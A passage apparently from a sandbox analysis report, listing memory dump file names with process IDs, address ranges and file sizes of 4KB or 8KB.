                                                                                        • memory/2956-296-0x0000000001F00000-0x0000000001F01000-memory.dmp

                                                                                          Filesize

                                                                                          4KB

                                                                                        • memory/2972-334-0x0000000002450000-0x0000000002452000-memory.dmp

                                                                                          Filesize

                                                                                          8KB

                                                                                        • memory/2984-214-0x0000000000950000-0x0000000000951000-memory.dmp

                                                                                          Filesize

                                                                                          4KB

                                                                                        • memory/2984-229-0x0000000004C60000-0x0000000004C61000-memory.dmp

                                                                                          Filesize

                                                                                          4KB

                                                                                        • memory/3048-326-0x000000001CAF0000-0x000000001CAF2000-memory.dmp

                                                                                          Filesize

                                                                                          8KB

                                                                                        • memory/3048-221-0x000000013F500000-0x000000013F501000-memory.dmp

                                                                                          Filesize

                                                                                          4KB